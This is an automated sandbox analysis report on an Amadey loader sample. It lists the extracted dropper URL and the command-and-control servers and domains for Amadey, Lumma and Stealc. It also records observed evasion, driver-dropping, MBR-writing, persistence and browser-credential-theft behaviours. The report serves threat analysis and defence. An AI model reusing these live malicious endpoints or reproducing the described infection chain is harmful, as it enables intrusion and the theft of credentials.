amadey | d4cf07f30e19535dd48e4a54dd0e8a5030dff5db91c5e1317dd3d4251c6e3c6d

Analysis

max time kernel
103s
max time network
303s
platform
windows11-21h2_x64
resource
win11-20250314-en
resource tags

arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system
submitted
29/03/2025, 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

5.4MB
MD5

0bf31c73f0e95a18595dd60e3ce41359
SHA1

00ab9a13e756265f4e45ae70f6af587a8c8184b5
SHA256

d4cf07f30e19535dd48e4a54dd0e8a5030dff5db91c5e1317dd3d4251c6e3c6d
SHA512

761c571d62e846428f560c99c18ff672ff8ea3354f3d929e9868f06e48ecae569049910dd40893ded90bf38a51d3883ef12a4572f58f6ea2a60262a7e85e527c
SSDEEP

98304:SY8MKMFkmzuwOXs4cYIeDhmzwiI7qyudXcrHwVPDo:pVKMFAwO8rpiQz9eXuRD

Score

10^/10

amadey healer lumma stealc 092155 trump bootkit credential_access defense_evasion discovery dropper execution exploit persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://smeltingt.run/giiaus

https://fferromny.digital/gwpd

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral4/memory/7464-18616-0x0000000000F50000-0x0000000001390000-memory.dmp	healer
behavioral4/memory/7464-18615-0x0000000000F50000-0x0000000001390000-memory.dmp	healer
behavioral4/memory/7464-19632-0x0000000000F50000-0x0000000001390000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 10092 created 3000	10092	MSBuild.exe	49
PID 10748 created 3000	10748	MSBuild.exe	49

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	47d39b3628.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	39dcfe81d4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2bf597a585.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1R32M4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2Y8961.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
10612	Process not Found
2824	Process not Found
5888	Process not Found
7624	PowerShell.exe
13884	Process not Found
12996	powershell.exe
13884	powershell.exe
5208	powershell.exe
13252	Process not Found
10388	powershell.exe
8016	powershell.exe
13692	Process not Found
10376	Process not Found
13804	Process not Found
4724	powershell.exe
13384	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 10 IoCs

flow	pid	Process
6	4908	rapes.exe
9	4908	rapes.exe
80	4908	rapes.exe
80	4908	rapes.exe
80	4908	rapes.exe
105	4908	rapes.exe
144	13588	futors.exe
8	5520	svchost.exe
32	4908	rapes.exe
32	4908	rapes.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\klupd_8234ce61a_arkmon.sys	22b31629.exe
File created	C:\Windows\System32\Drivers\8234ce61.sys	22b31629.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2012	takeown.exe
876	icacls.exe

Sets service image path in registry 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\8234ce61\ImagePath = "System32\\Drivers\\8234ce61.sys"	22b31629.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_8234ce61a_arkmon\ImagePath = "System32\\Drivers\\klupd_8234ce61a_arkmon.sys"	22b31629.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\W2z6i_1944\ImagePath = "\\??\\C:\\Windows\\Temp\\W2z6i_1944.sys"	tzutil.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 64 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1220	Process not Found
2852	Process not Found
7612	Process not Found
6908	chrome.exe
12768	chrome.exe
10536	Process not Found
1056	Process not Found
11380	Process not Found
10820	Process not Found
6628	chrome.exe
11204	chrome.exe
2600	Process not Found
8248	Process not Found
5072	Process not Found
6704	Process not Found
22760	Process not Found
11820	Process not Found
16020	Process not Found
11604	Process not Found
4000	Process not Found
11000	Process not Found
8228	Process not Found
6812	chrome.exe
12836	chrome.exe
10720	Process not Found
23116	Process not Found
4304	msedge.exe
7944	Process not Found
6320	Process not Found
432	Process not Found
11204	chrome.exe
12988	Process not Found
4488	Process not Found
3136	Process not Found
8112	Process not Found
10976	Process not Found
10956	chrome.exe
12204	msedge.exe
10836	chrome.exe
10436	Process not Found
13864	Process not Found
2416	Process not Found
9824	Process not Found
16044	Process not Found
7516	chrome.exe
10996	chrome.exe
4872	chrome.exe
9204	Process not Found
2112	Process not Found
13688	Process not Found
13096	Process not Found
4804	Process not Found
14304	msedge.exe
13760	Process not Found
13036	Process not Found
16480	Process not Found
11056	Process not Found
11632	chrome.exe
14332	msedge.exe
10524	Process not Found
11320	Process not Found
1924	Process not Found
5048	Process not Found
16472	Process not Found

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2Y8961.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	39dcfe81d4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2bf597a585.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2bf597a585.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1R32M4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	47d39b3628.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	39dcfe81d4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	47d39b3628.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1R32M4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2Y8961.exe

Deletes itself 1 IoCs

pid	Process
5172	w32tm.exe

Executes dropped EXE 29 IoCs

pid	Process
5804	g0F78.exe
4636	1R32M4.exe
4908	rapes.exe
4992	2Y8961.exe
2936	u75a1_003.exe
232	rapes.exe
1944	tzutil.exe
5172	w32tm.exe
2352	7IIl2eE.exe
9608	Passwords.com
10024	TbV75ZR.exe
10972	47d39b3628.exe
11448	EPTwCQd.exe
3740	Rm3cVPI.exe
11952	39dcfe81d4.exe
12240	rapes.exe
12428	apple.exe
12628	22.exe
13088	22.exe
4836	2a0f2bc6.exe
7380	hYjiwV0.exe
8332	22b31629.exe
12416	amnew.exe
13588	futors.exe
9892	Rm3cVPI.exe
8340	gron12321.exe
5888	2bf597a585.exe
10412	v7942.exe
10568	TbV75ZR.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	2bf597a585.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	1R32M4.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	2Y8961.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	47d39b3628.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	39dcfe81d4.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 3 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\8234ce61.sys	22b31629.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\8234ce61.sys	22b31629.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\8234ce61.sys\ = "Driver"	22b31629.exe

Loads dropped DLL 16 IoCs

pid	Process
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe
8332	22b31629.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2012	takeown.exe
876	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	g0F78.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\35d52f48-8d29-45f4-950d-8adf522167ee = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{3a99b3e1-f3b3-48a4-98d6-9171b7db485b}\\35d52f48-8d29-45f4-950d-8adf522167ee.cmd\""	22b31629.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	39dcfe81d4.exe
File opened for modification	\??\PhysicalDrive0	22b31629.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral4/files/0x001b00000002b41b-17101.dat	autoit_exe
behavioral4/files/0x000300000002a74d-18444.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
8676	tasklist.exe
6576	tasklist.exe
7620	tasklist.exe
8404	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
4636	1R32M4.exe
4908	rapes.exe
4992	2Y8961.exe
232	rapes.exe
10972	47d39b3628.exe
11952	39dcfe81d4.exe
12240	rapes.exe
5888	2bf597a585.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 10024 set thread context of 10092	10024	TbV75ZR.exe	118
PID 11448 set thread context of 11496	11448	EPTwCQd.exe	127
PID 7380 set thread context of 7460	7380	hYjiwV0.exe	203
PID 8340 set thread context of 10836	8340	gron12321.exe	599
PID 10412 set thread context of 10608	10412	v7942.exe	696
PID 10568 set thread context of 10748	10568	TbV75ZR.exe	698

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	2a0f2bc6.exe
File opened (read-only)	\??\VBoxMiniRdrDN	22b31629.exe

Drops file in Windows directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	1R32M4.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
13560	sc.exe
13636	sc.exe
6388	sc.exe
13940	sc.exe
3368	sc.exe
3312	sc.exe
13480	sc.exe
1384	sc.exe
13820	sc.exe
13868	sc.exe
13204	sc.exe
13448	sc.exe
548	sc.exe
3992	sc.exe
13356	sc.exe
13808	sc.exe
3636	sc.exe
644	sc.exe
13372	sc.exe
3144	sc.exe
7120	sc.exe
4720	sc.exe
568	sc.exe
5024	sc.exe
13536	sc.exe
13880	sc.exe
5828	sc.exe
6204	sc.exe
7060	sc.exe
13244	sc.exe
13584	sc.exe
5036	sc.exe
6452	sc.exe
3252	sc.exe
13656	sc.exe
3360	sc.exe
7164	sc.exe
13304	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
10356	10092	WerFault.exe	118
5532	5888	WerFault.exe	606
11856	10748	WerFault.exe	698
19168	8468	Process not Found	1589
7592	1532	Process not Found	1586
25452	4220	Process not Found	1591
1284	25780	Process not Found	1642
23144	12252	Process not Found	1643
9892	25920	Process not Found	1641
8832	5380	Process not Found	1682
19572	9152	Process not Found	1687
20372	20556	Process not Found	1714
20400	19976	Process not Found	1707
18560	20512	Process not Found	1713

System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	g0F78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	u75a1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2bf597a585.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	39dcfe81d4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22b31629.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2a0f2bc6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1R32M4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2Y8961.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	47d39b3628.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
11548	PING.EXE
3732	PING.EXE
13304	PING.EXE
10412	Process not Found
9080	Process not Found
8404	PING.EXE
5896	PING.EXE
10340	PING.EXE
14196	PING.EXE
9068	PING.EXE
13844	PING.EXE
9368	PING.EXE
4500	PING.EXE
6384	PING.EXE
3740	PING.EXE
1812	Process not Found
7996	PING.EXE
1996	PING.EXE
11540	PING.EXE
12560	PING.EXE
3948	PING.EXE
6876	PING.EXE
10420	PING.EXE
7608	PING.EXE
13692	PING.EXE
13640	PING.EXE
1176	PING.EXE
12924	PING.EXE
6376	PING.EXE
8208	PING.EXE
13032	PING.EXE
6976	PING.EXE
3096	PING.EXE
11180	Process not Found
2008	PING.EXE
7132	PING.EXE
3716	PING.EXE
8076	PING.EXE
10264	PING.EXE
13556	PING.EXE
14220	Process not Found
9668	Process not Found
5916	PING.EXE
9752	PING.EXE
9844	PING.EXE
13504	PING.EXE
13228	PING.EXE
5992	PING.EXE
9880	PING.EXE
12236	PING.EXE
10884	PING.EXE
12556	PING.EXE
5004	PING.EXE
2772	PING.EXE
10496	PING.EXE
7220	Process not Found
12272	PING.EXE
1820	PING.EXE
8108	PING.EXE
12236	PING.EXE
9140	Process not Found
6780	PING.EXE
10700	PING.EXE
5792	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 5 IoCs

defense_evasion

pid	Process
13276	timeout.exe
7424	timeout.exe
10392	Process not Found
7484	Process not Found
6560	Process not Found

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
6532	Process not Found
5208	Process not Found
5812	Process not Found
11504	Process not Found
5144	Process not Found

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877265245355291"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
2852	reg.exe
11636	reg.exe
10220	Process not Found
13440	Process not Found
5872	Process not Found
10684	reg.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
1828	PING.EXE
7032	PING.EXE
8360	PING.EXE
10860	PING.EXE
9704	PING.EXE
8888	PING.EXE
7080	PING.EXE
10424	PING.EXE
11636	PING.EXE
7224	PING.EXE
7152	Process not Found
4720	Process not Found
276	PING.EXE
13048	Process not Found
10884	PING.EXE
9280	PING.EXE
10060	Process not Found
12828	PING.EXE
9844	PING.EXE
6428	PING.EXE
9656	PING.EXE
13060	PING.EXE
2216	PING.EXE
10372	PING.EXE
12936	PING.EXE
2940	Process not Found
6480	Process not Found
13156	PING.EXE
2060	PING.EXE
14196	PING.EXE
11028	PING.EXE
940	PING.EXE
13292	PING.EXE
2872	PING.EXE
4704	PING.EXE
4624	PING.EXE
12604	PING.EXE
13124	PING.EXE
8528	Process not Found
3148	PING.EXE
8324	PING.EXE
5100	Process not Found
6876	PING.EXE
9184	PING.EXE
1492	PING.EXE
11988	PING.EXE
10284	Process not Found
936	PING.EXE
232	PING.EXE
5260	PING.EXE
9988	PING.EXE
9852	PING.EXE
2052	Process not Found
9100	PING.EXE
5740	PING.EXE
9816	Process not Found
6084	PING.EXE
6780	PING.EXE
6696	PING.EXE
13320	PING.EXE
2008	PING.EXE
6500	PING.EXE
13160	PING.EXE
8588	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3812	schtasks.exe
9936	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4636	1R32M4.exe
4636	1R32M4.exe
4908	rapes.exe
4908	rapes.exe
4992	2Y8961.exe
4992	2Y8961.exe
4992	2Y8961.exe
4992	2Y8961.exe
4992	2Y8961.exe
4992	2Y8961.exe
5208	powershell.exe
5208	powershell.exe
232	rapes.exe
232	rapes.exe
13884	powershell.exe
13884	powershell.exe
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com
10092	MSBuild.exe
10092	MSBuild.exe
10092	MSBuild.exe
10092	MSBuild.exe
10208	svchost.exe
10208	svchost.exe
10208	svchost.exe
10208	svchost.exe
10448	powershell.exe
10448	powershell.exe
10972	47d39b3628.exe
10972	47d39b3628.exe
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com
9608	Passwords.com
10972	47d39b3628.exe
10972	47d39b3628.exe
10972	47d39b3628.exe
10972	47d39b3628.exe
11496	MSBuild.exe
11496	MSBuild.exe
11496	MSBuild.exe
11496	MSBuild.exe
3740	Rm3cVPI.exe
3740	Rm3cVPI.exe
3740	Rm3cVPI.exe
3740	Rm3cVPI.exe
11952	39dcfe81d4.exe
11952	39dcfe81d4.exe
12240	rapes.exe
12240	rapes.exe
7460	MSBuild.exe
7460	MSBuild.exe
7460	MSBuild.exe
7460	MSBuild.exe
7836	chrome.exe
7836	chrome.exe
9892	Rm3cVPI.exe
9892	Rm3cVPI.exe
9892	Rm3cVPI.exe
9892	Rm3cVPI.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
1944	tzutil.exe
668	Process not Found
668	Process not Found
8332	22b31629.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2936	u75a1_003.exe
2936	u75a1_003.exe
2936	u75a1_003.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe
7836	chrome.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeDebugPrivilege	5208	powershell.exe
Token: SeDebugPrivilege	13884	powershell.exe
Token: SeDebugPrivilege	8404	tasklist.exe
Token: SeDebugPrivilege	8676	tasklist.exe
Token: SeLoadDriverPrivilege	1944	tzutil.exe
Token: SeDebugPrivilege	10448	powershell.exe
Token: SeDebugPrivilege	8332	22b31629.exe
